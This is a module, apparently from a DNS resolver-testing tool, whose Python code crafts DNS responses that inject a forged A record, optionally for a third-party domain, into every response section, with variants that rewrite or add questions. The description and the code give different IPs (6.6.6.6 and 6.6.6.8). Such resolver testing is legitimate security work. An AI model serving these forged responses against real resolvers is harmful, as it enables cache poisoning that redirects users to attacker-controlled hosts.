[module]
name = "inj08"
type = "feature"
info = "Injection 8 - Only injected A record in all sections"
desc = "Respond only with injected A record (inj08poc.yourdomain.com -> 6.6.6.6) in all sections."
author = "ivan.jedek@oryxlabs.com"
category = "Record injections"

code = '''
if req.first_subdomain.startswith("inj08"):
   # Send only 1 injected A record in all sections
   injip = "6.6.6.8"
   addedquestions = b''
   if "3rdparty" in req.subdomains:  # inject a 3rd party domain
      injdom = "injected08." + a3rdparty_domain
   else:
      injdom = "injected08." + req.sld_tld_domain
   if "rpq" in req.subdomains:  # replace the question with our injected stuffs
      orig_req_domain = req.full_domain
      req.full_domain = injdom
      addcustomlog("RPQ")
   if "adq" in req.subdomains:  # add additional question for our injected stuffs
      resp.QURR = req.QURR+1
      addedquestions  = convDom2Bin(injdom) + req.type_bin + req.class_bin
      addcustomlog("ADQ")
   ### DNS header ########
   buffer = prep_dns_header(b'\x84\x00', resp.QURR, 1, 1, 1)
   ### QUESTION SECTION ########
   if resp.noq: buffer += convDom2Bin(req.full_domain) + req.type_bin + req.class_bin
   buffer += addedquestions
   ### ANSWER SECTION ########
   # injected A
   buffer += convDom2Bin(injdom) + getTypeBin("A") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", 4)                        ## Data length
   buffer += socket.inet_aton(injip)                     ## IP
   ### AUTHORITY SECTION ########
   # injected A
   buffer += convDom2Bin(injdom) + getTypeBin("A") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", 4)                        ## Data length
   buffer += socket.inet_aton(injip)                     ## IP
   ### ADDITIONAL SECTION ########
   # injected A
   buffer += convDom2Bin(injdom) + getTypeBin("A") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                 ## TTL
   buffer += struct.pack(">H", 4)                        ## Data length
   buffer += socket.inet_aton(injip)                     ## IP
   # log and send
   log("A %s (%s) in ALL sections" % (injdom, injip))
   send_buf(self, buffer)
   #####################################################################
'''
